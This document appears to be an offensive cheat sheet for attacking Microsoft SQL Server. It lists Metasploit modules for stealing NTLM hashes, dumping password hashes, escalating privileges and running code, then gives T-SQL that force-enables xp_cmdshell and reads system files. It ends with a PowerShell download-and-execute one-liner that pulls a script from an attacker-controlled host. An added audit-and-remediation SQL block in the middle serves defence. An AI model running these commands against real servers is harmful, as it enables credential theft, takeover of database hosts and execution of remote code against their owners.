#NTLM theft
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
#Steals the NTLM hash; start Responder before running the module
#Info gathering
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
msf> use auxiliary/admin/mssql/mssql_idf
#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as
#If the user holds the IMPERSONATE privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner
#Escalate from db_owner to sysadmin
#Code execution
msf> use admin/mssql/mssql_exec
msf> use exploit/windows/mssql/mssql_payload
#Add a new administrator from a meterpreter session
msf> use windows/manage/mssql_local_auth_bypass
> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
Code execution
To execute code on MSSQL, xp_cmdshell must be enabled. If it is not, it can be forcibly enabled with sufficient privileges.
Check
> xp_cmdshell 'whoami';
> go
Enable xp_cmdshell
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
> xp_cmdshell 'whoami';
> go
Force enabling
> EXEC SP_CONFIGURE 'show advanced options', 1;
> reconfigure;
> go
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
> xp_cmdshell 'whoami';
> go
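The sp_configure sequence above is the same switch a reviewer checks from the other side. The following T-SQL is an added defensive example, not part of the original cheat sheet: it audits the instance for xp_cmdshell being enabled, lists who holds the server permissions that allow re-enabling it or that the escalation modules in the Metasploit list look for (IMPERSONATE grants, linked servers, sysadmin membership), and then turns xp_cmdshell back off. It assumes it is run as sysadmin on the instance under review; the catalog views and permission names are standard SQL Server, no values are taken from the page.

```sql
-- Added defensive example (not from the original page). Run as sysadmin.

-- 1. Is xp_cmdshell enabled? 'show advanced options' = 1 is itself a hint
--    that someone has been through the sequence on this page.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options', 'Ole Automation Procedures');

-- 2. Who can flip it back on or read files? sp_configure needs ALTER SETTINGS,
--    OPENROWSET(BULK ...) needs ADMINISTER BULK OPERATIONS.
SELECT sp.name AS login_name, sp.type_desc, perm.permission_name, perm.state_desc
FROM sys.server_permissions AS perm
JOIN sys.server_principals AS sp ON sp.principal_id = perm.grantee_principal_id
WHERE perm.permission_name IN ('ALTER SETTINGS', 'CONTROL SERVER',
                               'ADMINISTER BULK OPERATIONS', 'IMPERSONATE ANY LOGIN');

-- 3. Server-level impersonation grants (what mssql_escalate_execute_as relies on):
--    which login may EXECUTE AS which other login.
SELECT grantee.name AS grantee, target.name AS can_impersonate, perm.state_desc
FROM sys.server_permissions AS perm
JOIN sys.server_principals AS grantee ON grantee.principal_id = perm.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = perm.major_id
WHERE perm.class_desc = 'SERVER_PRINCIPAL' AND perm.permission_name = 'IMPERSONATE';

-- 4. sysadmin membership (the end goal of mssql_escalate_dbowner).
SELECT name, type_desc, is_disabled
FROM sys.server_principals
WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;

-- 5. Linked servers (what mssql_linkcrawler walks) and the logins mapped to them.
SELECT s.name, s.data_source, s.provider, ll.remote_name, ll.uses_self_credential
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1;

-- 6. Remediation: disable xp_cmdshell and hide advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Queries 1 to 5 are read-only and can be scheduled as a baseline check; a non-empty result from query 3 or an unexpected `value_in_use = 1` in query 1 is the finding to investigate. Step 6 changes server state, so run it only once the dependency on xp_cmdshell has been confirmed absent.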
File download
> xp_cmdshell 'powershell.exe -exec bypass iex(new-object net.webclient).downloadstring(''http://<your ip>:<port>/script.ps1'')';
> go